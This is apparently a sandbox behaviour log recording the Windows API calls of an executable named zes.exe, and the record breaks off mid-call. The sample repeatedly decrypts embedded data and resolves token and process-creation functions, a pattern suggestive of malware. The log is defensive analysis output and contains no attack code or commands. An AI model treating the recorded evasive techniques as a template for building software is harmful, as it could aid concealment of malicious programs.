# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 07.08.2020 18:49:02.869 Process: id = "1" image_name = "zes.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zes.exe" page_root = "0x36a81000" os_pid = "0x634" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zes.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x798 [0054.579] GetVersion () returned 0x1db10106 [0054.579] GetCurrentProcess () returned 0xffffffff [0054.579] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x18ff70 | out: TokenHandle=0x18ff70*=0xa0) returned 1 [0054.586] GetTokenInformation (in: TokenHandle=0xa0, TokenInformationClass=0x14, TokenInformation=0x18ff74, TokenInformationLength=0x4, ReturnLength=0x18ff78 | out: TokenInformation=0x18ff74, ReturnLength=0x18ff78) returned 1 [0054.586] CloseHandle (hObject=0xa0) returned 1 [0054.587] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zes.exe\" " [0054.587] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zes.exe\" ", pNumArgs=0x18ff78 | out: pNumArgs=0x18ff78) returned 0x534b58*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zes.exe" [0054.587] GetProcessHeap () returned 0x520000 [0054.587] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1) returned 0x534bc8 [0054.587] GetProcessHeap () returned 0x520000 [0054.587] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x534bd8 [0054.587] CryptAcquireContextW (in: phProv=0x534bd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x534bd8*=0x534c10) returned 1 [0055.439] GetProcessHeap () returned 0x520000 [0055.440] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa0) returned 0x536998 [0055.440] CryptImportKey (in: hProv=0x534c10, pbData=0x18fef0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x534f38) returned 1 [0055.442] CryptDecrypt (in: hKey=0x534f38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x536998, pdwDataLen=0x534c00 | out: pbData=0x536998, pdwDataLen=0x534c00) returned 1 [0055.443] CryptDestroyKey (hKey=0x534f38) returned 1 [0055.443] GetSystemWindowsDirectoryW (in: lpBuffer=0x41a020, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0055.444] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x41a228, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zes.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zes.exe")) returned 0x2d [0055.444] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x41b228, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0055.449] GetProcessHeap () returned 0x520000 [0055.449] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x534ec0 [0055.449] GetProcessHeap () returned 0x520000 [0055.449] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536c60 [0055.449] GetProcessHeap () returned 0x520000 [0055.449] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5361b8 [0055.449] GetProcessHeap () returned 0x520000 [0055.449] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x533f80 [0055.449] CryptImportKey (in: hProv=0x534c10, pbData=0x18fef8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536e58) returned 1 [0055.449] CryptDecrypt (in: hKey=0x536e58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x533f80, pdwDataLen=0x18ff60 | out: pbData=0x533f80, pdwDataLen=0x18ff60) returned 1 [0055.449] CryptDestroyKey (hKey=0x536e58) returned 1 [0055.449] GetProcessHeap () returned 0x520000 [0055.449] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x533fa8 [0055.449] CryptImportKey (in: hProv=0x534c10, pbData=0x18fef8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536e58) returned 1 [0055.449] CryptDecrypt (in: hKey=0x536e58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x533fa8, pdwDataLen=0x18ff60 | out: pbData=0x533fa8, pdwDataLen=0x18ff60) returned 1 [0055.449] CryptDestroyKey (hKey=0x536e58) returned 1 [0055.449] GetProcessHeap () returned 0x520000 [0055.449] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x534fe8 [0055.449] CryptImportKey (in: hProv=0x534c10, pbData=0x18fef8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536e58) returned 1 [0055.450] CryptDecrypt (in: hKey=0x536e58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x534fe8, pdwDataLen=0x18ff60 | out: pbData=0x534fe8, pdwDataLen=0x18ff60) returned 1 [0055.450] CryptDestroyKey (hKey=0x536e58) returned 1 [0055.450] GetProcessHeap () returned 0x520000 [0055.450] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x536e58 [0055.450] CryptImportKey (in: hProv=0x534c10, pbData=0x18fef8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536ee0) returned 1 [0055.450] CryptDecrypt (in: hKey=0x536ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x536e58, pdwDataLen=0x18ff64 | out: pbData=0x536e58, pdwDataLen=0x18ff64) returned 1 [0055.450] CryptDestroyKey (hKey=0x536ee0) returned 1 [0055.450] GetProcessHeap () returned 0x520000 [0055.450] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x536c70 [0055.450] GetProcessHeap () returned 0x520000 [0055.450] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xd) returned 0x5361d0 [0055.450] GetProcessHeap () returned 0x520000 [0055.450] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1f) returned 0x533fd0 [0055.450] GetProcessHeap () returned 0x520000 [0055.450] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1e) returned 0x533ff8 [0055.450] GetProcessHeap () returned 0x520000 [0055.450] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xd) returned 0x5361e8 [0055.450] GetProcessHeap () returned 0x520000 [0055.451] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x536ee0 [0055.451] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0055.451] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0055.451] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0055.451] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0055.451] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77710000 [0055.451] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessWithTokenW") returned 0x7775531f [0055.451] GetProcessHeap () returned 0x520000 [0055.451] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536e58 | out: hHeap=0x520000) returned 1 [0055.451] GetProcessHeap () returned 0x520000 [0055.451] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5361d0 | out: hHeap=0x520000) returned 1 [0055.451] GetProcessHeap () returned 0x520000 [0055.451] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x533fd0 | out: hHeap=0x520000) returned 1 [0055.451] GetProcessHeap () returned 0x520000 [0055.452] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x533ff8 | out: hHeap=0x520000) returned 1 [0055.452] GetProcessHeap () returned 0x520000 [0055.452] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5361e8 | out: hHeap=0x520000) returned 1 [0055.452] GetProcessHeap () returned 0x520000 [0055.452] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536ee0 | out: hHeap=0x520000) returned 1 [0055.452] GetProcessHeap () returned 0x520000 [0055.452] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536c70 | out: hHeap=0x520000) returned 1 [0055.452] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x18ff58, cchData=32 | out: lpLCData="\x03") returned 16 [0055.452] GetProcessHeap () returned 0x520000 [0055.452] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x536c70 [0055.452] GetProcessHeap () returned 0x520000 [0055.452] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa0) returned 0x536e58 [0055.452] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536f00) returned 1 [0055.452] CryptDecrypt (in: hKey=0x536f00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x536e58, pdwDataLen=0x18ff48 | out: pbData=0x536e58, pdwDataLen=0x18ff48) returned 1 [0055.452] CryptDestroyKey (hKey=0x536f00) returned 1 [0055.452] GetProcessHeap () returned 0x520000 [0055.452] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536c80 [0055.452] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x12) returned 0x536f00 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536c90 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x533ff8 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536f20 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5361e8 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536f30 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x533fd0 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536f40 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5361d0 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536f50 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x26) returned 0x536f60 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536f90 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x536fa0 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536e58 | out: hHeap=0x520000) returned 1 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x536fd8 [0055.453] GetProcessHeap () returned 0x520000 [0055.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x534020 [0055.453] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536e58) returned 1 [0055.453] CryptDecrypt (in: hKey=0x536e58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x534020, pdwDataLen=0x18ff48 | out: pbData=0x534020, pdwDataLen=0x18ff48) returned 1 [0055.453] CryptDestroyKey (hKey=0x536e58) returned 1 [0055.453] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x536fe8 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x536200 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534020 | out: hHeap=0x520000) returned 1 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x536ff8 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x534020 [0055.454] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536e58) returned 1 [0055.454] CryptDecrypt (in: hKey=0x536e58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x534020, pdwDataLen=0x18ff48 | out: pbData=0x534020, pdwDataLen=0x18ff48) returned 1 [0055.454] CryptDestroyKey (hKey=0x536e58) returned 1 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537008 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x534048 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534020 | out: hHeap=0x520000) returned 1 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x537018 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a0) returned 0x5373c0 [0055.454] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x536e58) returned 1 [0055.454] CryptDecrypt (in: hKey=0x536e58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5373c0, pdwDataLen=0x18ff48 | out: pbData=0x5373c0, pdwDataLen=0x18ff48) returned 1 [0055.454] CryptDestroyKey (hKey=0x536e58) returned 1 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537028 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537038 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537048 [0055.454] GetProcessHeap () returned 0x520000 [0055.454] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537058 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537068 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537078 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537088 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537098 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5370a8 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x536218 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5370b8 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x536230 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5370c8 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x536248 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5370d8 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5370e8 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5370f8 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537108 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537118 [0055.455] GetProcessHeap () returned 0x520000 [0055.455] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537128 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537138 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x537148 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537158 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x536e58 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537168 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x536260 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537178 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x536278 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537188 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537198 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5371a8 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5371b8 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5371c8 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5371d8 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5371e8 [0055.456] GetProcessHeap () returned 0x520000 [0055.456] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5371f8 [0055.456] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537208 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537218 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537228 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537238 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537248 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537258 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537268 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537278 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537288 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537298 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5372a8 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x536290 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5372b8 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5372c8 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5372d8 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5372e8 [0055.457] GetProcessHeap () returned 0x520000 [0055.457] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5372f8 [0055.457] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537308 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537318 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5362a8 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537328 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537338 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537348 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537358 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537368 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537378 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537388 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537398 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5373a8 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537580 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537590 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5375a0 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5375b0 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5375c0 [0055.458] GetProcessHeap () returned 0x520000 [0055.458] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5375d0 [0055.458] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5362c0 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5375e0 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5375f0 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537600 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x12) returned 0x536e78 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537610 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5362d8 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537620 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5362f0 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537630 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537640 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537650 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x536308 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537660 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x536320 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5373c0 | out: hHeap=0x520000) returned 1 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x537670 [0055.459] GetProcessHeap () returned 0x520000 [0055.459] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x120) returned 0x5373c0 [0055.459] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: 